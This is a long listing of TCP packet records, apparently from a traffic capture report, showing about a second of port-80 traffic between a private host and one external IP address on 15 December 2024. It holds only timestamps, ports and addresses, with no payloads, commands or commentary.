                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.812510014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.812612057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.812834024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.813673019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.813791990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.814827919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.814939976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.814944029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.814986944 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.816028118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.816138983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.816677094 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.817182064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.817281008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.817663908 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.818325996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.818439007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.818552017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.819529057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.819618940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.820631027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.820729971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.820755005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.821789980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.821896076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.821923971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.821955919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.822938919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.823020935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.824150085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.824233055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.824254990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.824287891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.825267076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.825377941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.825495958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.826468945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.826536894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.827589989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.827696085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.827704906 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.827747107 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.828780890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.828861952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.828991890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.829948902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.830127954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.831182957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.831237078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.831280947 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.831326962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.832274914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.832415104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.832549095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.833406925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.833560944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.834573030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.834611893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.834645033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.836000919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.836035967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.836103916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.836138964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.836973906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.837085962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.837198973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.838141918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.838264942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.839255095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.839346886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.839391947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.839493036 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.840401888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.840531111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.841046095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.841723919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.841826916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.842775106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.842864990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.843003988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.843097925 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.844050884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.844166040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.844738007 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.845093966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.845256090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.846213102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.846311092 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.846333027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.846385002 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.847425938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.847460032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.848619938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.848714113 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.848736048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.848779917 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.849692106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.849792957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.849912882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.850861073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.851023912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.852005959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.852098942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.852171898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.852271080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.853173971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.853358984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.853456974 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.854341030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.854477882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.855552912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.855632067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.855659008 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.855691910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.856647968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.856834888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.856982946 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.857861996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.857914925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.858974934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.859067917 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.859080076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.859126091 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.860152960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.860259056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.860635996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.861282110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.861428022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.862452030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.862541914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.862565994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.862658978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.863600016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.863718987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.864451885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.864775896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.864891052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.865933895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.866029978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.866049051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.866096020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.867126942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.867268085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.868184090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.868277073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.999468088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.999672890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.999774933 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.999922037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.000029087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.000123978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.001029015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.001502991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.001564026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.001627922 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.002636909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.002703905 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.002765894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.003771067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.003848076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.003897905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.005047083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.005117893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.005209923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.006297112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.006347895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.006373882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.007261992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.007353067 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.007395983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.008426905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.008568048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.008604050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.009598017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.009670973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.009742022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.010776043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.010848999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.010922909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.011908054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.012037039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.012142897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.013108015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.013199091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.013308048 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.014214993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.014309883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.014344931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.015424967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.015496969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.015515089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.016544104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.016618967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.016732931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.017760038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.017827988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.017853022 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.018897057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.019011021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.019108057 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.020154953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.020190001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.020226955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.021212101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.021281004 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.021332026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.022584915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.022656918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.022763968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.023530006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.023600101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.023679972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.024683952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.024755955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.024837971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.025860071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.026026964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.026119947 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.027038097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.027095079 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.027163029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.028343916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.028410912 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.028503895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.029341936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.029414892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.029469967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.030493975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.030605078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.030702114 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.031696081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.031757116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.031800032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.032912970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.032974958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.033068895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.034207106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.034285069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.034321070 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.035135031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.035207033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.035228968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.036330938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.036395073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.036469936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.037451029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.037573099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.037676096 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.038630962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.038686991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.038724899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.039824009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.039890051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.039895058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.040941954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.041007996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.041124105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.042119026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.042246103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.042352915 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.043366909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.043418884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.043452978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.044435978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.044524908 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.044554949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.045582056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.045711040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.045845032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.046780109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.046871901 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.046900034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.047923088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.048080921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.048207045 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.049092054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.049189091 CET8049708185.81.68.147192.168.2.5
